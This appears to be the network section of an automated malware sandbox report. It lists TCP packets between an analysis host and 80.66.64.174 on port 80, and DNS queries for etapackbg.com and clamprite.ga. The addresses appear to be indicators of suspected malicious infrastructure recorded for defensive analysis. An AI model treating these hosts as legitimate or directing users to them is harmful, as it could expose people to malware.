                                                                                                  Feb 26, 2022 09:31:20.165955067 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.165955067 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.165997982 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.166009903 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.166035891 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.166043043 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.166079998 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.166090965 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.166136980 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.166140079 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.166179895 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.166183949 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.166220903 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.166222095 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.166263103 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.166265965 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.166305065 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.166346073 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.166368961 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.166384935 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.166409016 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.166425943 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.166449070 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.166465998 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.166490078 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.166506052 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.166529894 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.166547060 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.166570902 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.166584969 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.166609049 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.166625023 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.166649103 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.166666031 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.166690111 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.166707039 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.166729927 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.166747093 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.166770935 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.166786909 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.166810036 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.166826010 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.166858912 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.166867018 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.166889906 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.167682886 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.257317066 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.257344961 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.257402897 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.257435083 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.260256052 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.260274887 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.260304928 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.260313034 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.260317087 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.260332108 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.260349989 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.260350943 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.260368109 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.260370970 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.260386944 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.260401011 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.265945911 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.265976906 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.266000032 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.266022921 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.266088009 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.266112089 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.266113997 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.266185045 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.266206026 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.266227961 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.266228914 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.266249895 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.266252041 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.266273975 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.266275883 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.266295910 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.266299009 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.266319990 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.266321898 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.266345978 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.266360044 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.266367912 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.266380072 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.266388893 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.266412973 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.266432047 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.266433001 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.266477108 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.268208027 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.268251896 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.268271923 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.268294096 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.268316031 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.268336058 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.268337011 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.268359900 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.268366098 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.268368959 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.269296885 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.269321918 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.269336939 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.269356012 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.269372940 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.269390106 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.269392967 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.269407988 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.269408941 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.269428015 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.269428968 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.269444942 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.269448042 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.269464016 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.269465923 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.269481897 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.269484043 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.269490004 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.269500971 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.269520044 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.269520998 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.269536972 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.269541025 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.269546032 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.269556999 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.269573927 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.269577026 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.269592047 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.269612074 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.269627094 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.269632101 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.269644022 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.269661903 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.269665956 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.269680023 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.269685030 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.269697905 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.269704103 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.269717932 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.269718885 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.269736052 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.269738913 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.269754887 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.269758940 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.269773006 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.269776106 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.269792080 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.269793034 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.269809961 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.269812107 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.269828081 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.269845009 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.269865036 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.269870043 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.269874096 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.269880056 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.269910097 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.269927025 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.269929886 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.269943953 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.269964933 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.269994020 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.270009995 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.270013094 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.270040035 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.270051956 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.270056963 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.270075083 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.270077944 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.270092964 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.270097017 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.270111084 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.270116091 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.270129919 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.270131111 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.270145893 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.270147085 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.270162106 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.270164967 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.270179033 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.270194054 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.270226955 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.270243883 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.270261049 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.270277977 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.270287991 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.270296097 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.270306110 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.270313025 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.270323038 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.270332098 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.270334959 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.270349979 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.270359039 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.270368099 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.270384073 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.270385027 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.270395041 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.270404100 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.270414114 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.270421982 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.270437956 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.270441055 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.270452976 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.270459890 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.270478010 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.270479918 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.270484924 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.270494938 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.270498037 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.270512104 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.270514965 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.270529985 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.270536900 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.270546913 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.270553112 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.270565987 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.270570040 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.270584106 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.270586967 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.270601034 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.270605087 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.270620108 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.270620108 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.270637989 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.270649910 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.270654917 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.270658016 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.270673037 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.270683050 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.270690918 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.270700932 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.270705938 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.270709991 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.270728111 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.270730019 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.270745039 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.270747900 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.270754099 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.270762920 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.270781040 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.270785093 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.270797014 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.270800114 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.270814896 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.270817995 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.270833015 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.270833969 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.270850897 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.270854950 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.270859957 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.270869970 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.270885944 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.270899057 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:20.270905972 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.270920992 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.276675940 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:20.701566935 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:27.326339960 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:27.426798105 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:48.632595062 CET4916980192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:48.736628056 CET804916980.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:48.736732006 CET4916980192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:48.736900091 CET4916980192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:48.736931086 CET4916980192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:48.841048002 CET804916980.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:48.841109991 CET4916980192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:48.946732998 CET804916980.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:48.946827888 CET4916980192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:49.050724983 CET804916980.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:49.050771952 CET804916980.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:49.050777912 CET4916980192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:49.050786018 CET804916980.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:49.050810099 CET4916980192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:49.050843000 CET4916980192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:49.154814005 CET804916980.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:49.154833078 CET804916980.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:49.154844999 CET804916980.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:49.154859066 CET804916980.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:49.154884100 CET804916980.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:49.154896021 CET4916980192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:49.154943943 CET4916980192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:49.154966116 CET4916980192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:49.154978037 CET4916980192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:49.260138035 CET804916980.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:49.260157108 CET804916980.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:49.260170937 CET804916980.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:49.260229111 CET4916980192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:49.260234118 CET804916980.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:49.260252953 CET804916980.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:49.260288000 CET4916980192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:49.364244938 CET804916980.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:49.364330053 CET804916980.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:49.364341021 CET804916980.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:49.364343882 CET804916980.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:49.364351034 CET804916980.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:49.364537001 CET804916980.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:49.364639997 CET804916980.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:49.364651918 CET804916980.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:49.364664078 CET804916980.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:49.707791090 CET804916980.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:49.707917929 CET4916980192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:49.708005905 CET4916980192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:49.812233925 CET804916980.66.64.174192.168.2.22

                                                                                                  UDP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Feb 26, 2022 09:30:31.266514063 CET5216753192.168.2.228.8.8.8
                                                                                                  Feb 26, 2022 09:30:31.287288904 CET53521678.8.8.8192.168.2.22
                                                                                                  Feb 26, 2022 09:31:15.869607925 CET5059153192.168.2.228.8.8.8
                                                                                                  Feb 26, 2022 09:31:16.229867935 CET53505918.8.8.8192.168.2.22
                                                                                                  Feb 26, 2022 09:31:16.232950926 CET5059153192.168.2.228.8.8.8
                                                                                                  Feb 26, 2022 09:31:16.251480103 CET53505918.8.8.8192.168.2.22

                                                                                                  DNS Queries

                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                  Feb 26, 2022 09:30:31.266514063 CET192.168.2.228.8.8.80x79edStandard query (0)etapackbg.comA (IP address)IN (0x0001)
                                                                                                  Feb 26, 2022 09:31:15.869607925 CET192.168.2.228.8.8.80xe897Standard query (0)clamprite.gaA (IP address)IN (0x0001)
                                                                                                  Feb 26, 2022 09:31:16.232950926 CET192.168.2.228.8.8.80xe897Standard query (0)clamprite.gaA (IP address)IN (0x0001)

                                                                                                  DNS Answers

                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                  Feb 26, 2022 09:30:31.287288904 CET8.8.8.8192.168.2.220x79edNo error (0)etapackbg.com172.67.166.49A (IP address)IN (0x0001)
                                                                                                  Feb 26, 2022 09:30:31.287288904 CET8.8.8.8192.168.2.220x79edNo error (0)etapackbg.com104.21.89.250A (IP address)IN (0x0001)
